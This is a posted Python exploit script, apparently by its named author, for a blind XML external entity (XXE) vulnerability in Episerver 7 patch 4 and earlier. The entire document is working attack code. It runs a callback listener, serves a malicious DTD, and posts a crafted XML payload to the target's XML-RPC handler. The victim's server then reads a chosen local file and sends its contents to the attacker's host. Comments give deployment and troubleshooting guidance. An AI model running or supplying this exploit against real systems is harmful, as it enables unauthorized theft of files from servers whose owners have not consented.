jonaslejon

Episerver XXE Exploit

Aug 28th, 2018
#!/usr/bin/python
##
## episploit.py - Blind XXE file read exploit for Episerver 7 patch 4 and below
##
## The script starts its own HTTP listener (port 8000 by default) that the
## *target* connects back to, so it must run on a host with a public IP and an
## unfiltered port: configure RHOST below. Note that RHOST here is the
## attacker-side callback address (our IP:port), not the target host as the
## Metasploit naming convention would suggest.
##
## Written by Jonas Lejon 2017-12-19 <jonas.xxe@triop.se> https://triop.se
## Based on https://gist.github.com/mgeeky/7f45c82e8d3097cbbbb250e37bc68573
##
## Usage: ./episploit.py <target> [file-URI-to-read]
##        The optional second argument is used verbatim as the external
##        entity's SYSTEM identifier, so give a full URI such as
##        file:///c:/windows/win.ini (the default), not a bare path.
##

import os
import re
import socket
import sys
import threading
import time
import urllib
from BaseHTTPServer import BaseHTTPRequestHandler, HTTPServer

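# Listener bind address.  0.0.0.0 because the *target* has to reach us; the
# port must also be open on the public side of whatever sits in front of us.
SERVER_SOCKET   = ('0.0.0.0', 8000)

# URI the victim's XML parser is told to read (overridden by argv[2]).  It is
# inserted verbatim as an external-entity SYSTEM identifier, so it must be a
# full URI; a bare path would be resolved relative to the DTD's own URL, i.e.
# against our listener instead of the victim's disk.
EXFIL_FILE      = 'file:///c:/windows/win.ini'

# The host:port the VICTIM connects back to - our public IP, not the target
# (despite the Metasploit-style name).  Set the CALLBACK_HOST environment
# variable or edit the placeholder; the port follows SERVER_SOCKET.
RHOST           = os.environ.get('CALLBACK_HOST', '1.2.3.4') + ':' + str(SERVER_SOCKET[1])

# Set by the listener once the file contents have arrived; main() waits on it.
EXFILTRATED_EVENT = threading.Event()
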
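class BlindXXEServer(BaseHTTPRequestHandler):
    """Attacker-side HTTP listener implementing the out-of-band XXE channel.

    Two URLs matter:

    * ``GET /?exfil=<data>`` - the callback carrying the file contents.
      They are printed and ``EXFILTRATED_EVENT`` is set so ``main`` can
      stop waiting.
    * ``<anything>.dtd`` - serves the second-stage DTD.  It declares a
      parameter entity that reads ``EXFIL_FILE`` on the victim and a
      general entity ``exfil`` whose SYSTEM URI points back at ``RHOST``
      with that content in the query string.

    Every other request is answered with ``false`` and logged as
    ``[INFO]`` so stray probes at the listener remain visible.
    """

    def response(self, **data):
        """Send one complete HTTP response and close the output stream.

        Keyword arguments: ``code`` (default 200), ``content_type``
        (default ``text/plain``) and ``body`` (text, default empty).
        The body goes out UTF-8 encoded with an explicit Content-Length,
        so a client need not rely on the connection closing to find the
        end of the body.
        """
        code = data.get('code', 200)
        content_type = data.get('content_type', 'text/plain')
        payload = data.get('body', '').encode('utf-8')

        self.send_response(code)
        self.send_header('Content-Type', content_type)
        self.send_header('Content-Length', str(len(payload)))
        self.end_headers()
        self.wfile.write(payload)
        self.wfile.close()

    def do_GET(self):
        """Route GET through the shared handler."""
        self.request_handler(self)

    def do_POST(self):
        """Route POST through the shared handler."""
        self.request_handler(self)

    def log_message(self, format, *args):
        # Silence BaseHTTPRequestHandler's per-request stderr line; the
        # handler prints what matters itself.
        return

    def request_handler(self, request):
        """Route one request; ``request`` is the handler instance itself
        (``do_GET``/``do_POST`` pass ``self``)."""
        m = re.match(r'/\?exfil=(.*)', request.path)
        if m and request.command.lower() == 'get':
            # Unquote exactly once.  The previous version unquoted twice,
            # which corrupts any literal '%XX' sequence in the stolen file,
            # and then called .decode('utf8'), which could raise on
            # non-ASCII / non-UTF-8 content and lose the callback.  The
            # bytes are printed as-is: the file has no guaranteed encoding.
            data = urllib.unquote(m.group(1))
            print('Exfiltrated %s:' % EXFIL_FILE)
            print('-' * 30)
            print(data)
            print('-' * 30 + '\n')
            self.response(body='true')

            EXFILTRATED_EVENT.set()

        elif request.path.endswith('.dtd'):
            print('Sending malicious DTD file.')
            # The file content ends up inside an entity value and then a
            # URL, so a file containing '<', '&', '%' or a quote usually
            # breaks the victim's parse before any callback is made; plain
            # text such as win.ini is what this channel can carry.
            dtd = '''<!ENTITY %% param_exfil SYSTEM "%(exfil_file)s">
<!ENTITY %% param_request "<!ENTITY exfil SYSTEM 'http://%(exfil_host)s/?exfil=%%param_exfil;'>">
%%param_request;''' % {'exfil_file' : EXFIL_FILE, 'exfil_host' : RHOST}

            self.response(content_type='text/xml', body=dtd)

        else:
            print('[INFO] %s %s' % (request.command, request.path))
            self.response(body='false')
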
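def send_stage1(target, port=80):
    """Send the stage-1 XML to the target's XML-RPC handler.

    The document only declares an external DTD at ``http://RHOST/test.dtd``;
    the victim's parser fetches it from our listener, which serves the real
    payload (see ``BlindXXEServer``).

    :param target: hostname or IPv4 address of the Episerver site.  A
        ``host:port`` form is accepted and overrides ``port`` (IPv6 literals
        are not supported: the socket is AF_INET and ':' is the separator).
    :param port: TCP port to connect to when ``target`` carries none.  Plain
        HTTP only - this script does not speak TLS.
    :raises socket.error: on connection failure; a timeout while waiting for
        the target's reply is only reported, not raised.
    """
    host = target
    if ':' in target:
        host, port = target.rsplit(':', 1)
        port = int(port)

    content = ('<?xml version="1.0"?><!DOCTYPE foo SYSTEM "http://' + RHOST
               + '/test.dtd"><foo>&exfil;</foo>')
    # CRLF line endings as HTTP requires; the previous version used bare LF,
    # which some servers tolerate but none require.
    request = '\r\n'.join([
        'POST /util/xmlrpc/Handler.ashx?pageid=1023 HTTP/1.1',
        'Host: ' + target,
        'User-Agent: curl/7.54.0',
        'Accept: */*',
        'Content-Length: ' + str(len(content)),
        'Content-Type: application/x-www-form-urlencoded',
        'Connection: close',
        '',
        content,
    ])

    print('Sending payload..')
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    # Bound every socket call: the old code could hang forever in connect().
    s.settimeout(15)
    try:
        s.connect((host, port))
        # sendall(): send() may write only part of the request.
        s.sendall(request)
        # Show the status line: a 404/500 from the target explains a missing
        # callback far better than a silent wait would.
        try:
            status = s.recv(1024).split('\r\n', 1)[0]
        except socket.timeout:
            status = '(no response within timeout)'
        print('Target answered: ' + status)
    finally:
        s.close()
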
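def main(target, timeout=None):
    """Start the listener, send stage 1 to ``target`` and wait for the callback.

    :param target: host (or ``host:port``) handed to ``send_stage1``.
    :param timeout: seconds to wait for the exfiltration callback; ``None``
        (the default, matching the previous behaviour) waits indefinitely.
    :returns: True if the file arrived, False on timeout.

    The wait uses ``Event.wait`` in one-second slices instead of the old
    ``while not set: pass`` busy loop, which pinned a CPU core; the listener
    is shut down on every exit path so the port is released.
    """
    server = HTTPServer(SERVER_SOCKET, BlindXXEServer)
    thread = threading.Thread(target=server.serve_forever)
    thread.daemon = True
    thread.start()
    deadline = None if timeout is None else time.time() + timeout
    try:
        send_stage1(target)
        while not EXFILTRATED_EVENT.is_set():
            if deadline is not None and time.time() >= deadline:
                print('[WARN] no callback within %s seconds: check that %s is '
                      'reachable from the target' % (timeout, RHOST))
                return False
            EXFILTRATED_EVENT.wait(1)
        return True
    finally:
        # Runs on success, timeout, socket errors from send_stage1 and Ctrl-C.
        server.shutdown()
        server.server_close()
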
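if __name__ == '__main__':
    # The previous version raised NameError on a missing target; fail with
    # usage instead.
    if len(sys.argv) < 2:
        print('Usage: %s <target> [file-URI-to-read]' % sys.argv[0])
        print('  e.g. %s www.example.com file:///c:/windows/win.ini'
              % sys.argv[0])
        sys.exit(1)
    target = sys.argv[1]
    if len(sys.argv) > 2:
        # Module scope, so this rebinds the global read by the listener.
        EXFIL_FILE = sys.argv[2]
    # The victim must be able to reach RHOST; the shipped value is a
    # placeholder and a run with it can never receive a callback.
    if RHOST.startswith('1.2.3.4:'):
        print('[ERROR] RHOST is still the placeholder 1.2.3.4 - set it to the '
              'public IP of this listener before running')
        sys.exit(1)
    main(target)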